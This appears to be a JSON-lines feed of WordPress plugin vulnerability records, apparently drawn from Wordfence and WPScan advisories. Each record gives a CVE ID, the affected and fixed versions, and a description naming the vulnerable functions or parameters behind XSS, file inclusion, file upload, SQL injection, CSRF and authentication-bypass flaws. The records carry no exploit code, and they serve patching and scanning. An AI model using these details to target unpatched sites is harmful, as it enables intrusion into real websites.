{"CVE_ID":"CVE-2025-6997","slug":"trx_addons","versionImpact":"2.35.1.1","versionEndExcluding":"2.35.2.2","description":"The ThemeREX Addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 2.35.1.1 due to insufficient input sanitization and output escaping. The plugin\u2019s SVG rendering routine calls the trx_addons_get_svg_from_file() function on an unvalidated 'svg' parameter supplied via the shortcode or Elementor widget settings, then outputs it via the trx_addons_show_layout() function.  Because there is no check on the URL\u2019s origin, scheme, or the SVG content itself, authenticated attackers, with Contributor-level access and above, can supply a remote SVG and inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","recommendation":"Update to version 2.35.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/themerex.net\\\/wp\\\/download_plugins\\\/themerex-addons\\\/\",\"name\":\"https:\\\/\\\/themerex.net\\\/wp\\\/download_plugins\\\/themerex-addons\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e1b19017-b2f0-4c3b-b263-1fbec6f1dce4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e1b19017-b2f0-4c3b-b263-1fbec6f1dce4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11094","slug":"404-solution","versionImpact":"2.35.17","versionEndExcluding":"2.35.18","description":"The 404 Solution plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.35.17 via the export feature. This makes it possible for unauthenticated attackers to extract sensitive data such as redirects including GET parameters which may reveal sensitive information.","recommendation":"Update to version 2.35.18, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d738be73-2573-4fb8-b6f0-768a08628265?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d738be73-2573-4fb8-b6f0-768a08628265?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3188844%40404-solution%2Ftrunk&old=3169186%40404-solution%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3188844%40404-solution%2Ftrunk&old=3169186%40404-solution%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6799","slug":"yith-essential-kit-for-woocommerce-1","versionImpact":"2.34.0","versionEndExcluding":"2.35.0","description":"The YITH Essential Kit for WooCommerce #1 plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'activate_module', 'deactivate_module', and 'install_module' functions in all versions up to, and including, 2.34.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to install, activate, and deactivate plugins from a pre-defined list of available YITH plugins.","recommendation":"Update to version 2.35.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca497ffa-6306-46dc-895f-94f1d5236e28?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca497ffa-6306-46dc-895f-94f1d5236e28?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yith-essential-kit-for-woocommerce-1\\\/trunk\\\/class-yith-jetpack.php#L425\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yith-essential-kit-for-woocommerce-1\\\/trunk\\\/class-yith-jetpack.php#L425\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yith-essential-kit-for-woocommerce-1\\\/trunk\\\/class-yith-jetpack.php#L457\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yith-essential-kit-for-woocommerce-1\\\/trunk\\\/class-yith-jetpack.php#L457\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yith-essential-kit-for-woocommerce-1\\\/trunk\\\/class-yith-jetpack.php#L487\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yith-essential-kit-for-woocommerce-1\\\/trunk\\\/class-yith-jetpack.php#L487\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3120283\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3120283\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0682","slug":"trx_addons","versionImpact":"2.33.0","versionEndExcluding":"2.34.0","description":"The ThemeREX Addons plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.33.0 via the 'trx_sc_reviews' shortcode 'type' attribute. This makes it possible for authenticated attackers, with contributor-level and above permissions, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where php file type can be uploaded and included.","recommendation":"Update to version 2.34.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/qwery-multipurpose-business-wordpress-theme\\\/29678687\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/qwery-multipurpose-business-wordpress-theme\\\/29678687\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/15a9718f-f877-4e33-8f7a-950791c4ca85?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/15a9718f-f877-4e33-8f7a-950791c4ca85?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13448","slug":"trx_addons","versionImpact":"2.32.3","versionEndExcluding":"2.34.0","description":"The ThemeREX Addons plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'trx_addons_uploads_save_data' function in all versions up to, and including, 2.32.3. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 2.34.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/qwery-multipurpose-business-wordpress-theme\\\/29678687\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/qwery-multipurpose-business-wordpress-theme\\\/29678687\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7c1372bd-821d-439c-9b11-dfa5f08dd0dd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7c1372bd-821d-439c-9b11-dfa5f08dd0dd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4248","slug":"give","versionImpact":"2.33.3","versionEndExcluding":"2.33.4","description":"The GiveWP plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.33.3. This is due to missing or incorrect nonce validation on the give_stripe_disconnect_connect_stripe_account function. This makes it possible for unauthenticated attackers to deactivate the plugin's stripe integration settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 2.33.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2bff8dea-6971-47d4-bd2c-0821687033e5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2bff8dea-6971-47d4-bd2c-0821687033e5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/trunk\\\/includes\\\/gateways\\\/stripe\\\/includes\\\/admin\\\/admin-actions.php?rev=2585755#L361\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/trunk\\\/includes\\\/gateways\\\/stripe\\\/includes\\\/admin\\\/admin-actions.php?rev=2585755#L361\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2974851%40give%2Ftrunk&old=2973080%40give%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2974851%40give%2Ftrunk&old=2973080%40give%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4247","slug":"give","versionImpact":"2.33.3","versionEndExcluding":"2.33.4","description":"The GiveWP plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.33.3. This is due to missing or incorrect nonce validation on the give_sendwp_disconnect function. This makes it possible for unauthenticated attackers to deactivate the SendWP plugin via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 2.33.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e32d9104-5a39-4455-b76a-e24ae787bdfd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e32d9104-5a39-4455-b76a-e24ae787bdfd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/trunk\\\/includes\\\/admin\\\/misc-functions.php?rev=2772225#L333\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/trunk\\\/includes\\\/admin\\\/misc-functions.php?rev=2772225#L333\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2974851%40give%2Ftrunk&old=2973080%40give%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2974851%40give%2Ftrunk&old=2973080%40give%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4246","slug":"give","versionImpact":"2.33.3","versionEndExcluding":"2.33.4","description":"The GiveWP plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.33.3. This is due to missing or incorrect nonce validation on the give_sendwp_remote_install_handler function. This makes it possible for unauthenticated attackers to install and activate the SendWP plugin via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 2.33.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc5c511f-dc79-468b-a107-cdf50999faf8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc5c511f-dc79-468b-a107-cdf50999faf8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/trunk\\\/includes\\\/admin\\\/misc-functions.php?rev=2772225#L258\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/trunk\\\/includes\\\/admin\\\/misc-functions.php?rev=2772225#L258\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2974851%40give%2Ftrunk&old=2973080%40give%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2974851%40give%2Ftrunk&old=2973080%40give%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12850","slug":"database-backup","versionImpact":"2.32","versionEndExcluding":"2.33","description":"The Database Backup and check Tables Automated With Scheduler 2024 plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 2.32 via the database_backup_ajax_download() function. This makes it possible for authenticated attackers, with administrator-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.","recommendation":"Update to version 2.33, or a newer patched version","refs":"[{\"url\":\"http:\\\/\\\/plugins.svn.wordpress.org\\\/database-backup\\\/tags\\\/2.32\\\/functions\\\/download.php\",\"name\":\"http:\\\/\\\/plugins.svn.wordpress.org\\\/database-backup\\\/tags\\\/2.32\\\/functions\\\/download.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3212315\\\/database-backup\\\/trunk\\\/functions\\\/download.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3212315\\\/database-backup\\\/trunk\\\/functions\\\/download.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b972626c-6374-4084-a0e1-1ea4a3062228?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b972626c-6374-4084-a0e1-1ea4a3062228?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13789","slug":"ravpage","versionImpact":"2.31","versionEndExcluding":"2.33","description":"The ravpage plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.31 via deserialization of untrusted input from the 'paramsv2' parameter. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present.","recommendation":"Update to version 2.33, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ravpage\\\/trunk\\\/ravpage.php#L24\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ravpage\\\/trunk\\\/ravpage.php#L24\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5e0bcf70-2ffc-45c8-b63e-a8376b6cd22b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5e0bcf70-2ffc-45c8-b63e-a8376b6cd22b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2250","slug":"reportattacks","versionImpact":"2.32","versionEndExcluding":"2.33","description":"The WordPress Report Brute Force Attacks and Login Protection ReportAttacks Plugins plugin for WordPress is vulnerable to SQL Injection via the 'orderby' parameter in all versions up to, and including, 2.32 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.33, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/reportattacks\\\/tags\\\/2.32\\\/includes\\\/list-tables\\\/class-reportattacks-list-table.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/reportattacks\\\/tags\\\/2.32\\\/includes\\\/list-tables\\\/class-reportattacks-list-table.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3254851%40reportattacks&new=3254851%40reportattacks&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3254851%40reportattacks&new=3254851%40reportattacks&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/602bf9b1-17a9-441a-b12d-15412df2deb4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/602bf9b1-17a9-441a-b12d-15412df2deb4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1459","slug":"siteorigin-panels","versionImpact":"2.31.4","versionEndExcluding":"2.31.5","description":"The Page Builder by SiteOrigin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Embedded Video(PB) widget in all versions up to, and including, 2.31.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.31.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3247428%40siteorigin-panels&new=3247428%40siteorigin-panels&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3247428%40siteorigin-panels&new=3247428%40siteorigin-panels&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e14c12ef-0774-4459-9a2c-9a4b633a0efe?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e14c12ef-0774-4459-9a2c-9a4b633a0efe?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12240","slug":"siteorigin-panels","versionImpact":"2.31.0","versionEndExcluding":"2.31.1","description":"The Page Builder by SiteOrigin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the row label parameter in all versions up to, and including, 2.31.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.31.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/siteorigin-panels\\\/tags\\\/2.31.0\\\/tpl\\\/metabox-panels.php#L17\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/siteorigin-panels\\\/tags\\\/2.31.0\\\/tpl\\\/metabox-panels.php#L17\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/abe8c6b0-b16b-4391-88b4-dca507c973fc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/abe8c6b0-b16b-4391-88b4-dca507c973fc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36840","slug":"mp-timetable","versionImpact":"2.3.8","versionEndExcluding":"2.3.9","description":"The Timetable and Event Schedule by MotoPress plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the wp_ajax_route_url() function called via a nopriv AJAX action in versions up to, and including, 2.3.8. This makes it possible for unauthenticated attackers to call that function and perform a wide variety of actions such as including random template, injecting malicious web scripts, and more.","recommendation":"Update to version 2.3.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/988d7b33-f985-4d22-a2db-3922002fcecb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/988d7b33-f985-4d22-a2db-3922002fcecb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2288592%40mp-timetable&new=2288592%40mp-timetable&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2288592%40mp-timetable&new=2288592%40mp-timetable&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6688","slug":"simple-payment","versionImpact":"2.3.8","versionEndExcluding":"2.3.9","description":"The Simple Payment plugin for WordPress is vulnerable to Authentication Bypass in versions 1.3.6 to 2.3.8. This is due to the plugin not properly verifying a user's identity prior to logging them in through the create_user() function. This makes it possible for unauthenticated attackers to log in as administrative users.","recommendation":"Update to version 2.3.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3318371\\\/simple-payment\\\/tags\\\/2.3.9\\\/simple-payment-plugin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3318371\\\/simple-payment\\\/tags\\\/2.3.9\\\/simple-payment-plugin.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8b4e2f87-e3ad-4f1b-b647-f5e5a49f691b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8b4e2f87-e3ad-4f1b-b647-f5e5a49f691b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0060","slug":"responsive-gallery-grid","versionEndExcluding":"2.3.9","description":"The Responsive Gallery Grid WordPress plugin before 2.3.9 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/be2fc859-3158-4f06-861d-382381a7551b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/be2fc859-3158-4f06-861d-382381a7551b\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13882","slug":"aiomatic-automatic-ai-content-writer","versionImpact":"2.3.8","versionEndExcluding":"2.3.9","description":"The Aiomatic - Automatic AI Content Writer & Editor, GPT-3 & GPT-4, ChatGPT ChatBot & AI Toolkit plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'aiomatic_generate_featured_image' function in all versions up to, and including, 2.3.8. This makes it possible for authenticated attackers, with Contributor-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 2.3.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/coderevolution.ro\\\/knowledge-base\\\/faq\\\/full-changelog-aiomatic-automatic-ai-content-writer-editor-gpt-3-gpt-4-chatgpt-chatbot-ai-toolkit\\\/\",\"name\":\"https:\\\/\\\/coderevolution.ro\\\/knowledge-base\\\/faq\\\/full-changelog-aiomatic-automatic-ai-content-writer-editor-gpt-3-gpt-4-chatgpt-chatbot-ai-toolkit\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7108df0d-771a-4404-b90d-8ac8bc572898?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7108df0d-771a-4404-b90d-8ac8bc572898?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7514","slug":"comments-import-export-woocommerce","versionImpact":"2.3.7","versionEndExcluding":"2.3.9","description":"The WordPress Comments Import & Export plugin for WordPress is vulnerable to arbitrary file read due to insufficient file path validation during the comments import process, in versions up to, and including, 2.3.7. This makes it possible for authenticated attackers, with Author-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.\r\nThe issue was partially fixed in version 2.3.8 and fully fixed in 2.3.9","recommendation":"Update to version 2.3.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/30a79974-ee61-4764-8864-89659b1848a4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/30a79974-ee61-4764-8864-89659b1848a4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/comments-import-export-woocommerce\\\/tags\\\/2.3.7\\\/includes\\\/importer\\\/class-hf_cmt_impexpcsv-import.php#L346\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/comments-import-export-woocommerce\\\/tags\\\/2.3.7\\\/includes\\\/importer\\\/class-hf_cmt_impexpcsv-import.php#L346\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3634","slug":"month-name-translation-benaceur","versionImpact":"2.3.7","versionEndExcluding":"2.3.8","description":"The month name translation benaceur WordPress plugin before 2.3.8 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 2.3.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/76e000e0-314f-4e39-8871-68bf8cc95b22\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/76e000e0-314f-4e39-8871-68bf8cc95b22\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0504","slug":"wp-politic","versionEndExcluding":"2.3.8","description":"The HT Politic WordPress plugin before 2.3.8 does not have CSRF check when activating plugins, which could allow attackers to make logged in admins activate arbitrary plugins present on the blog via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b427841d-a3ad-4e3a-8964-baad90a9aedb\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b427841d-a3ad-4e3a-8964-baad90a9aedb\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1330","slug":"kadence-blocks-pro","versionImpact":"2.3.7","versionEndExcluding":"2.3.8","description":"The kadence-blocks-pro WordPress plugin before 2.3.8 does not prevent users with at least the contributor role using some of its shortcode's functionalities to leak arbitrary options from the database.","recommendation":"Update to version 2.3.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1988815b-7a53-4657-9b1c-1f83c9f9ccfd\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1988815b-7a53-4657-9b1c-1f83c9f9ccfd\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6711","slug":"event-tickets-with-ticket-scanner","versionImpact":"2.3.7","versionEndExcluding":"2.3.8","description":"The Event Tickets with Ticket Scanner WordPress plugin before 2.3.8 does not sanitise and escape some parameters, which could allow users with a role as low as admin to perform Cross-Site Scripting attacks","recommendation":"Update to version 2.3.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bf431b81-2db9-4fcb-841c-9b51d1870bf8\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bf431b81-2db9-4fcb-841c-9b51d1870bf8\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10516","slug":"swift-performance-lite","versionImpact":"2.3.7.1","versionEndExcluding":"2.3.7.2","description":"The Swift Performance Lite plugin for WordPress is vulnerable to Local PHP File Inclusion in all versions up to, and including, 2.3.7.1 via the 'ajaxify' function. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 2.3.7.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/swift-performance-lite\\\/trunk\\\/includes\\\/classes\\\/class.ajax.php#L795\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/swift-performance-lite\\\/trunk\\\/includes\\\/classes\\\/class.ajax.php#L795\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/swift-performance-lite\\\/trunk\\\/includes\\\/classes\\\/class.ajax.php#L824\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/swift-performance-lite\\\/trunk\\\/includes\\\/classes\\\/class.ajax.php#L824\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3201933\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3201933\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4921f41a-a9b1-4ae2-a903-c14ed22dcc15?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\